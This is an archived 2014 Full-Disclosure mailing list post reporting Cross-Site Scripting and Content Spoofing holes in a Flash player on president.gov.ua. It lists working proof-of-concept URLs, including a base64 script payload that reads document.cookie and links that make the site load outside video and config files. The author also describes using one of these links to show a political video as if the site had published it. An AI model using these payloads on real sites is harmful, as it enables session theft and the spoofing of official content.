lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Sun, 19 Jan 2014 21:20:35 +0200
From: "MustLive" <mustlive@...security.com.ua>
To: <full-disclosure@...ts.grok.org.uk>
Subject: Multiple vulnerabilities at president.gov.ua

Hello participants of Mailing List.

For those who didn't read my posts in social networks last night and at my
web site, here is information about multiple vulnerabilities at
president.gov.ua. There are Cross-Site Scripting and Cross-Site Request
Forgery vulnerabilities.

In January 2007 I made "presidents fiesta" - published multiple
vulnerabilities at web sites of presidents of Ukraine, Russia, USA,
Byelorussia and Slovakia. And here are new holes at web site of new
president of Ukraine.

Cross-Site Scripting (WASC-08):

http://president.gov.ua/js/jw/player.swf?abouttext=Player&aboutlink=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B

http://president.gov.ua/js/jw/player.swf?displayclick=link&link=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B&file=1.jpg

Content Spoofing (WASC-12):

http://president.gov.ua/js/jw/player.swf?file=http://mlfun.org.ua/video.flv&autostart=true

http://president.gov.ua/js/jw/player.swf?config=http://site/1.xml

http://president.gov.ua/js/jw/player.swf?abouttext=Player&aboutlink=http://websecurity.com.ua

Here is nice example of using one of these holes. The video is "published"
at president's web site, in which Victor Yanukovich told about his
corruption and criminal actions (on Ukrainian language).

http://president.gov.ua/js/jw/player.swf?file=http://mlfun.org.ua/video.flv&autostart=true

P.S.

Photos and videos of current protest events in Kyiv Ukraine see in Twitter
(including online video translation in my Twitter account).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists